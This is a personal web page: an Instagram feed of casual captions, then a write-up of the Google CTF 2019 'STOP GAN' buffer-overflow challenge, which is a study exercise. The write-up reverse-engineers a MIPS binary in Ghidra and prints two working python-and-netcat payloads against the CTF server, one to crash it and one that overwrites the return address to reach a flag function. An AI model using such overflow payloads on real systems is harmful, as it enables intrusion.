Follow me on Instagram
Never got bored of this Never got bored of this

Never got bored of this ...

18 2
Now that we can't go into Malaysia, I'm really cra Now that we can't go into Malaysia, I'm really craving this...

Now that we can't go into Malaysia, I'm really craving this... ...

9 9
Someone reminded me that I don't need many friends Someone reminded me that I don't need many friends. I just need a few good brothers that'll go out of their comfort zone just for you.

Someone reminded me that I don't need many friends. I just need a few good brothers that'll go out of their comfort zone just for you. ...

13 11
Rediscovering my music with the Creative Outlier G Rediscovering my music with the Creative Outlier Gold w/ software Super X-FI #maya329

Rediscovering my music with the Creative Outlier Gold w/ software Super X-FI #maya329 ...

6 0
Did anyone say pins? #maya329 Did anyone say pins? #maya329

Did anyone say pins? #maya329 ...

11 4
New team? New team?

New team? ...

6 0
When you're out of games to play, you break out th When you're out of games to play, you break out the Jenga and up the stakes.

When you're out of games to play, you break out the Jenga and up the stakes. ...

15 4
We gon be back real soon. Heads up! Search for us We gon be back real soon. Heads up! Search for us on Spotify! #theprinsepcrew

We gon be back real soon. Heads up! Search for us on Spotify! #theprinsepcrew ...

18 2
There's still empty spaces... There's still empty spaces...

There's still empty spaces... ...

13 5
... ...

... ...

38 4
Reality is but illusion. Stickers now available! L Reality is but illusion. Stickers now available! Link in bio! #maya329

Reality is but illusion. Stickers now available! Link in bio! #maya329 ...

13 2
It's been awhile but I felt like I should be honin It's been awhile but I felt like I should be honing my writing skills once more. I'm starting to do writeups on CTF events. You can find them under blog > GCTF 2019 Writeups. Link in bio.

It's been awhile but I felt like I should be honing my writing skills once more. I'm starting to do writeups on CTF events. You can find them under blog > GCTF 2019 Writeups. Link in bio. ...

8 1
It's finally ready. Link in bio. It's finally ready. Link in bio.

It's finally ready. Link in bio. ...

5 0
Together, let me hear you say "Throat Fk'd"! Together, let me hear you say "Throat Fk'd"!

Together, let me hear you say "Throat Fk'd"! ...

13 1
什麼情況,現在? 什麼情況,現在?

什麼情況,現在? ...

13 2
Usually people sick receive fruit basket, suppleme Usually people sick receive fruit basket, supplements, etc. I sick, I get Sake. #我不会

Usually people sick receive fruit basket, supplements, etc. I sick, I get Sake. #我不会 ...

30 1
She had a cocktail in her hand and ribbon in her h She had a cocktail in her hand and ribbon in her hair 🍸🎉

She had a cocktail in her hand and ribbon in her hair 🍸🎉 ...

15 1
Natural habitat. I forgot how fun this was. Natural habitat. I forgot how fun this was.

Natural habitat. I forgot how fun this was. ...

18 1
Happiness is not having to set the alarm for the n Happiness is not having to set the alarm for the next morning. Happy Saturday!😄

Happiness is not having to set the alarm for the next morning. Happy Saturday!😄 ...

16 2
I finally made it all the way to Friday to find ou I finally made it all the way to Friday to find out that I have to work on Saturday!🙍

I finally made it all the way to Friday to find out that I have to work on Saturday!🙍 ...

14 3
Back to Top
Image Alt

Google CTF 2019 // #05-1 STOP GAN (bof)

Writeup Series

Google CTF 2019 // #05-1 STOP GAN (bof)

Success, you’ve gotten the picture of your lost love, not knowing that pictures and the things you take pictures of are generally two seperate things, you think you’ve rescue them and their brethren by downloading them all to your ships hard drive. They’re still being eaten, but this is a fact that has escaped you entirely. Your thoughts swiftly shift to revenge. It’s important now to stop this program from destroying these “Cauliflowers” as they’re referred to, ever again.

 

buffer-overflow.ctfcompetition.com 1337

Once again, we were given a server address with a port and an attachment zip containing two files.

  • -rw-r–r–@ 1 maya staff 661K Nov 30 1979 bof
  • -rw-r–r–@ 1 maya staff 1.1K Nov 30 1979 console.c

Doing a quick file check on bof reveals it to be a MIPS ELF 32-bit executable.

Let’s try to connect to the server above first.

Seems like we’re supposed to crash the server. Opening up console.c reveals to us that it seems to tbe the script that’s running on the server itself. All input gets routed through the bof file.

Time to fire up Ghidra and reverse engineer the bof file. Luckily Ghidra supports MIPS architecture.

From the decompiled code, we can see that the max available size for our input is 260 bytes and the incorrect use of scanf leads to the buffer overflow that we’re trying to create to crash the system.

Now, the fastest way to send more than 260 bytes across to the server short of typing the character A more than 260 times is to use a quick python script.

python -c 'print "run\n" + "A"*300' | nc -v buffer-overflow.ctfcompetition.com 1337

This will make use the python to enter run followed by 270 As which will cause the buffer overflow.

There we go, we got the flag. Now moving on to the bonus flag. We are supposed to do a controlled crash. Doing a quick search of the bof file for the word flag yielded a couple results.

The local_flag function seems promising. Let’s try to land ourselves near that marker.

After multiple trial and errors, we will realize that that crash happens after the 264th A. So let’s do a quick python again.

python -c 'print "run\n" + "A"*(264)+"\x50\x08\x40\x00"' | nc -v buffer-overflow.ctfcompetition.com 1337

And finally, we got the bonus flag too.

Post a Comment